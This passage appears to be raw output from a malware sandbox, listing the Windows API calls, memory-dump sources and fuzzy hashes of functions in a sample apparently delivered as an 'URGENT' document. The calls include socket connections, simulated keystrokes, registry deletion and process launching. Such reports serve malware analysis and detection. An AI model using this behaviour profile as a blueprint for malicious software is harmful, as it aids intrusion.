• Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
• LoadStringW.USER32(00000000), ref: 00464319
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
• LoadStringW.USER32(00000000), ref: 00464336
• _wprintf.LIBCMT ref: 0046435C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00464357
Memory Dump Source
• Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
• Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
• Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
• Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                        • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                        • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                        • String ID:
                                                        • API String ID: 1211466189-0
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                        • _memmove.LIBCMT ref: 0046717E
                                                        • _memmove.LIBCMT ref: 0046719B
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 004861EB
                                                        • GetDC.USER32(00000000), ref: 004861F3
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        APIs
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                        • _wcstok.LIBCMT ref: 0046EC94
                                                        • _wcscpy.LIBCMT ref: 0046ED23
                                                        • _memset.LIBCMT ref: 0046ED56
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X
                                                        • API String ID: 774024439-3081909835
                                                        APIs
                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                                                        • inet_ntoa.WSOCK32(?), ref: 00476CA7
                                                          • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                                                          • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                                                        • _strlen.LIBCMT ref: 00476D44
                                                        • _memmove.LIBCMT ref: 00476DAD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                        • String ID:
                                                        • API String ID: 3619996494-0
                                                        APIs
                                                        • IsWindow.USER32(00A83C28), ref: 0048B3EB
                                                        • IsWindowEnabled.USER32(00A83C28), ref: 0048B3F7
                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                        • SendMessageW.USER32(00A83C28,000000B0,?,?), ref: 0048B512
                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                        • GetWindowLongW.USER32(00A83C28,000000EC), ref: 0048B571
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                        • String ID:
                                                        • API String ID: 4072528602-0
                                                        APIs
                                                        • _memset.LIBCMT ref: 0047F448
                                                        • _memset.LIBCMT ref: 0047F511
                                                        • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                        • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                                        • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 3522835683-2766056989
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00460F8C
                                                        • GetKeyboardState.USER32(?), ref: 00460FA1
                                                        • SetKeyboardState.USER32(?), ref: 00461002
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                        • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                                        • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                        • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00460DA5
                                                        • GetKeyboardState.USER32(?), ref: 00460DBA
                                                        • SetKeyboardState.USER32(?), ref: 00460E1B
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                        • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                                        • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                        • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                                        APIs
                                                        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,016B8311,?,00000000,?,00000000,00000000), ref: 016B7BDE
                                                        • __fassign.LIBCMT ref: 016B7C59
                                                        • __fassign.LIBCMT ref: 016B7C74
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 016B7C9A
                                                        • WriteFile.KERNEL32(?,?,00000000,016B8311,00000000,?,?,?,?,?,?,?,?,?,016B8311,?), ref: 016B7CB9
                                                        • WriteFile.KERNEL32(?,?,00000001,016B8311,00000000,?,?,?,?,?,?,?,?,?,016B8311,?), ref: 016B7CF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID:
                                                        • API String ID: 1324828854-0
                                                        • Opcode ID: 7bda4658fda1a1611d71ee46f71b1f63b8bc96019d4ee484e3936861eb85034e
                                                        • Instruction ID: 1ea0a81b50c1b2af343e9fe17b33eeb6ee1f28b31c771abec435b61a53f18c78
                                                        • Opcode Fuzzy Hash: 7bda4658fda1a1611d71ee46f71b1f63b8bc96019d4ee484e3936861eb85034e
                                                        • Instruction Fuzzy Hash: 4C51A372A00209AFDB20CFA8DC85AEEBBF9EF49340F15455AE555E73C1D7309991CBA0
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: ,,I$DllGetClassObject
                                                        • API String ID: 753597075-1683996018
                                                        • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                        • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                                                        • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                        • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                                                        APIs
                                                        • _memset.LIBCMT ref: 004872AA
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                                        • IsMenu.USER32(?), ref: 00487369
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                                        • DrawMenuBar.USER32 ref: 004873C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                        • String ID: 0
                                                        • API String ID: 3866635326-4108050209
                                                        • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                        • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                                        • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                        • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                                        • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                                          • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                                          • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                                          • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                        • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                                        • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                        • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                                        • GetWindowLongW.USER32(00A83C28,000000F0), ref: 0048631F
                                                        • GetWindowLongW.USER32(00A83C28,000000F0), ref: 00486354
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                        • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                                        • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                        • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                                        APIs
                                                          • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                        • WSAGetLastError.WSOCK32 ref: 00476221
                                                        • closesocket.WSOCK32(00000000), ref: 0047624A
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 910771015-0
                                                        • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                        • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                                        • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                        • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                                        APIs
                                                          • Part of subcall function 016B31DA: _free.LIBCMT ref: 016B3203
                                                        • _free.LIBCMT ref: 016B3264
                                                          • Part of subcall function 016B2096: HeapFree.KERNEL32(00000000,00000000,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?), ref: 016B20AC
                                                          • Part of subcall function 016B2096: GetLastError.KERNEL32(?,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?,?), ref: 016B20BE
                                                        • _free.LIBCMT ref: 016B326F
                                                        • _free.LIBCMT ref: 016B327A
                                                        • _free.LIBCMT ref: 016B32CE
                                                        • _free.LIBCMT ref: 016B32D9
                                                        • _free.LIBCMT ref: 016B32E4
                                                        • _free.LIBCMT ref: 016B32EF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                        • Instruction ID: 2f91b56ad6d4fbde2cf4f1652bd0038a45acbddaa4bf7a4228a2900cc8bf1726
                                                        • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                        • Instruction Fuzzy Hash: D9116D32B81B05AAD530FBB0CC85FCB77EF7F15701F40081CAA9A66261DA24B594C754
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                                        • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                                        • EncodePointer.KERNEL32(00000000), ref: 00424097
                                                        • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 3489934621-2819208100
                                                        • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                        • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                                        • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                        • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,016B473A,?,?,00000000), ref: 016B4543
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,016B473A,?,?,00000000,?,?,?), ref: 016B45C9
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 016B46C3
                                                        • __freea.LIBCMT ref: 016B46D0
                                                          • Part of subcall function 016B32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 016B332C
                                                        • __freea.LIBCMT ref: 016B46D9
                                                        • __freea.LIBCMT ref: 016B46FE
                                                        Memory Dump Source
